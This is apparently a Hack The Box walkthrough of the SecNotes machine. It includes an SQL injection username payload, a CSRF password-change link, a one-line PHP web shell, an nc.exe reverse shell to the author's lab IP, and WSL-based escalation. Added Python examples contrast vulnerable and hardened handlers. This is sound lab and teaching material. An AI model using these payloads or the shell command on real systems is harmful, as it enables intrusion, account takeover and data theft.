
SecNotes Walkthrough(Hack The Box)

·1387 words·7 mins·
Medium Windows Hack the Box Hacking Active Directory Walkthrough

Reconnaissance & Enumeration

  • As usual I started with an Nmap scan; the interesting open ports were 445 (SMB), 80 (HTTP) and 8808 (HTTP).
  • A web port on an Active Directory box seemed worth a look, so I checked port 80 first: a login page, with an option to sign up for a new account.
  • The site offers a note-saving feature for its users.
  • For starters I registered an account and logged in.
  • After a while I started enumerating and noticed something: the notes are listed by username, and the username is also displayed on the page. That is a strong hint that the username goes straight into a backend lookup.

Exploitation

  • There are two ways to exploit this website; I list both below.

Testing SQL Injection -> Path-1

  • Seeing this, SQL injection came to mind. Listing notes by nothing more than the username is dangerous: a single valid injection payload could make the backend return every note on the server, including other users' notes.
  • If SQL injection is new to you, I have a short post on SQL injection for beginners; please check it.
  • I started the attack by trying 'or 1=1 -- - on the login page, which didn't work. So the idea is to register an account whose username is the payload itself. I created an account with the username 'or 1=1 -- - and it succeeded: there is no validation on usernames. In my opinion input validation on everything is a requirement.
  • With the malicious username I can now view everyone's notes.
  • I searched through all the notes, and in one of them I found a username and password for an SMB share.
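The lookup pattern described above, reproduced as an added example (not code from the SecNotes box) against an in-memory SQLite table of constructed sample notes. It shows why a username of 'or 1=1 -- - makes a string-built WHERE clause match every row, and how the parameterised form of the same query treats the payload as a plain, non-matching username. The trailing "-" in the payload only matters for MySQL, which requires whitespace after "--"; SQLite accepts the comment either way.

```python
"""Added example: a notes-by-username lookup, vulnerable and parameterised,
exercised with the walkthrough's payload. Table layout and rows are constructed."""
import sqlite3

PAYLOAD = "' or 1=1 -- -"


def make_db() -> sqlite3.Connection:
    # Constructed sample data: three users, one of whom keeps credentials in a note.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE notes (username TEXT, title TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO notes VALUES (?, ?, ?)",
        [
            ("alice", "todo", "buy milk"),
            ("tyler", "share creds", "constructed placeholder, not the real note"),
            ("bob", "meeting", "3pm friday"),
        ],
    )
    return con


def list_notes_vulnerable(con: sqlite3.Connection, username: str) -> list:
    # Assumed backend pattern: the logged-in username is concatenated into the SQL.
    # With PAYLOAD the statement becomes
    #   SELECT username, title, body FROM notes WHERE username = '' or 1=1 -- -'
    # The "or 1=1" is always true and "--" comments out the dangling quote,
    # so every row is returned.
    sql = f"SELECT username, title, body FROM notes WHERE username = '{username}'"
    return con.execute(sql).fetchall()


def list_notes_safe(con: sqlite3.Connection, username: str) -> list:
    # Parameterised: the value travels separately from the SQL text, so the
    # payload is compared literally against the username column and matches nothing.
    sql = "SELECT username, title, body FROM notes WHERE username = ?"
    return con.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", list_notes_vulnerable(db, PAYLOAD))
    print("safe      :", list_notes_safe(db, PAYLOAD))
```

Registering the payload as the username (rather than typing it into the login form) is what makes this work on the box: the application later trusts the stored username and builds the notes query from it.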

CSRF/XSRF -> Path-2

  • After creating a normal account and logging in, we see a nice page with many options.
  • When we visit the Contact Us page we see a username, tyler@secnotes.htb, and below the name a message box.
  • Whatever message we write there is sent to tyler@secnotes.htb, as he is the recipient.
  • Let's test this field. I opened a netcat listener on port 7001:
nc -lnvp 7001
  • When I send an HTTP link containing my IP through the contact form, e.g. http://10.10.14.16:7001, I see a connection on my listener:
❯ nc -lvnp 7001                               
listening on [any] 7001 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.97] 50700
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.14.16:7001
Connection: Keep-Alive
  • The User-Agent (WindowsPowerShell/5.1) shows that something on the box automatically fetches every link sent to tyler. That is exactly what a CSRF attack needs: a victim with a valid session who visits attacker-chosen URLs.
  • This website has a vulnerable function: the password-changing function. The password-change request doesn't include any CSRF token, so we can abuse it with a CSRF attack.
Definition

What is Cross-site Request Forgery(CSRF/XSRF)

  • Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other. Source: portswigger

Prevention

  • This can be prevented by including a CSRF token with each state-changing request. A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. This makes it very difficult for an attacker to construct a valid request on behalf of the victim. Browsers' SameSite cookie defaults help as well, but a SameSite=Lax cookie is still sent on a top-level GET navigation, so state-changing actions must also never be reachable via a plain GET link.

  • Now let's carry on with our attack. change_pass.php takes its parameters in the POST body. This is the request:

POST /change_pass.php HTTP/1.1
Host: 10.10.10.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://10.10.10.97
Connection: keep-alive
Referer: http://10.10.10.97/change_pass.php
Cookie: PHPSESSID=gvrrikfl1rol8qiggi03dgpha3
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=kingoo&confirm_password=kingoo&submit=submit
  • I can also change my password with a plain GET request: http://10.10.10.97/change_pass.php?password=iamdumbasf&confirm_password=iamdumbasf&submit=submit. The handler accepts the same parameters from the query string, which means a bare link is enough. If I send this URL to tyler, I can get him to change his password to iamdumbasf.
  • I sent a message with this URL in it. It was successful: I logged in as tyler with the password iamdumbasf.
  • This was the request:
POST /contact.php HTTP/1.1
Host: 10.10.10.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://10.10.10.97
Connection: keep-alive
Referer: http://10.10.10.97/contact.php
Cookie: PHPSESSID=gvrrikfl1rol8qiggi03dgpha3
Upgrade-Insecure-Requests: 1
Priority: u=0, i

message=http%3A%2F%2F10.10.10.97%2Fchange_pass.php%3Fpassword%3Diamdumbasf%26confirm_password%3Diamdumbasf%26submit%3Dsubmit%26submit%3DSend&submit=Send
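The change_pass.php flow, modelled as an added example (not the box's PHP) so the two weaknesses the attack relies on can be seen side by side: the handler trusts any request carrying a valid session cookie, and it accepts its parameters from a GET query string, so the link above is a complete payload. The hardened version below refuses GET for the state change and requires a per-session token that a cross-site request cannot know. Endpoint and parameter names follow the walkthrough; the session id, users and passwords are constructed.

```python
"""Added example: a minimal model of change_pass.php, vulnerable and hardened.
Server state (sessions, passwords, tokens) is constructed sample data."""
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

TARGET = "http://10.10.10.97/change_pass.php"

# Constructed server state: tyler's logged-in session and his current password.
SESSIONS = {"tyler-session-id": "tyler"}
PASSWORDS = {"tyler": "original-password"}
CSRF_TOKENS = {}   # session id -> token issued when the change-password form was rendered


def build_csrf_link(new_password: str) -> str:
    """The attacker's payload: a plain link, as pasted into the contact form."""
    params = {"password": new_password, "confirm_password": new_password, "submit": "submit"}
    return TARGET + "?" + urlencode(params)


def query_params(url: str) -> dict:
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def change_pass_vulnerable(url: str, cookie: str) -> int:
    """Models the observed behaviour: any request carrying a valid PHPSESSID is
    honoured, parameters may come from the query string, and no token is checked."""
    user = SESSIONS.get(cookie)
    if user is None:
        return 403
    p = query_params(url)
    if not p.get("password") or p.get("password") != p.get("confirm_password"):
        return 400
    PASSWORDS[user] = p["password"]
    return 200


def render_change_form(cookie: str) -> str:
    """Hardened flow, step 1: the form embeds an unpredictable token bound to the session."""
    token = secrets.token_urlsafe(32)
    CSRF_TOKENS[cookie] = token
    return token


def change_pass_hardened(method: str, cookie: str, body: dict) -> int:
    """Hardened flow, step 2: POST only, and the body must echo the session's token."""
    user = SESSIONS.get(cookie)
    if user is None:
        return 403
    if method != "POST":
        return 405          # a bare link (GET) can never change state
    expected = CSRF_TOKENS.get(cookie)
    supplied = body.get("csrf_token", "")
    if expected is None or not secrets.compare_digest(supplied, expected):
        return 403          # cross-site request: the attacker cannot read tyler's token
    if not body.get("password") or body.get("password") != body.get("confirm_password"):
        return 400
    PASSWORDS[user] = body["password"]
    return 200


def demo() -> dict:
    cookie = "tyler-session-id"
    link = build_csrf_link("iamdumbasf")
    results = {}

    # Vulnerable handler: tyler's client follows the link with his cookie attached.
    results["vulnerable_get"] = change_pass_vulnerable(link, cookie)
    results["password_after_vulnerable"] = PASSWORDS["tyler"]

    # Hardened handler: the same link, then a forged POST without the token,
    # then a legitimate submission from the real form (which carries the token).
    PASSWORDS["tyler"] = "original-password"
    token = render_change_form(cookie)
    results["hardened_get"] = change_pass_hardened("GET", cookie, query_params(link))
    results["hardened_post_no_token"] = change_pass_hardened("POST", cookie, query_params(link))
    legit = {"password": "tylers-own-choice", "confirm_password": "tylers-own-choice",
             "csrf_token": token}
    results["hardened_post_with_token"] = change_pass_hardened("POST", cookie, legit)
    results["password_after_hardened"] = PASSWORDS["tyler"]
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Note the order of checks in the hardened handler: the method check comes first because a link delivered through the contact form can only ever produce a GET, and the token comparison uses a constant-time compare so the token cannot be guessed byte by byte.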

Accessing the SMB share
  • After enumerating the shares I logged into a share called new-site because it seemed interesting. It looks like a share for a web directory, either this site or the site on port 8808.
  • At this point I'm positive that this share is the web root of the site hosted on port 8808: anything I upload here can be triggered by requesting its path over HTTP, so a web shell is the obvious move.
  • I wasted literally two hours because my web shells were not working; after restarting the machine, one worked.

Shell
  • I created a file named cd.php with this code:
<?php system($_GET['cmd']); ?>
  • This payload runs whatever is passed in the cmd parameter through the system shell, giving command execution on the host.
  • After uploading it via SMB, I triggered/tested the shell by visiting http://secnotes.htb:8808/cd.php?cmd=whoami, i.e. with a command value of whoami.
  • I got a response. Then, to get a stable reverse shell, I uploaded nc.exe to the SMB share and called it through the web shell: http://10.10.10.97:8808/tester.php?cmd=nc.exe+-e+cmd.exe+10.10.14.5+6001
  • This is the command:
nc.exe -e cmd.exe <IP> <PORT>
  • I got a shell back.
  • Eventually got the user flag.

Privilege Escalation
  • I started my post-exploitation enumeration and found some interesting files in the C:\ directory.
  • The root directory of a system with WSL installed has directories like these, and the Ubuntu.zip indicates that this system has WSL installed.
  • WSL distributions are often configured with root as the default Linux user, so if I could execute bash I would get a root shell inside the distro. To my understanding there should be a launcher for bash as bash.exe, so I searched for it:
where /R c:\ bash.exe

Pivoting
  • I got the path, and after executing bash.exe I got root inside WSL easily.
  • Moments after stabilizing the shell with python3 -c 'import pty;pty.spawn("/bin/bash")', I enumerated and read the shell command history, where I could see the administrator password for a share.
  • Now I logged into the share with the administrator's password:
smbclient -U 'administrator%password' \\\\10.10.10.97\\c$
  • Downloaded root.txt with the get command.
  • Acquired the root flag.

Summary
I identified three open ports: 445 (SMB), 80 (HTTP), and 8808 (HTTP). I started by checking out the web server on port 80, which had a login page with a signup option. I registered an account and noticed that the notes displayed were tied to the username. This made me think about potential vulnerabilities, so I attempted an SQL injection by creating an account with the username 'or 1=1 -- -. To my surprise, this worked, and I was able to view all the notes in the system. I also found another way in, a CSRF attack: I built a password-change request as a URL and sent it to the user tyler through the contact form. Tyler's client followed the link, which changed the password for his account. One of the notes contained a username and password for an SMB share. I connected to this share, which turned out to be the web directory for the HTTP server running on port 8808, allowing me to upload files. I tried uploading web shells, but they didn't work initially. After restarting the machine, I finally got a PHP web shell to execute and used it to launch nc.exe for a reverse shell, granting me user access and the user flag. After gaining a foothold, I noticed some suspicious files in the C:\ directory, which hinted at WSL (Windows Subsystem for Linux) being present. I explored this further and located bash.exe. Executing it gave me root access to the Linux environment within WSL. To stabilize my access, I spawned a proper TTY shell and then checked the command history, where I found an administrator password for a share, which gave me the root flag.

bye
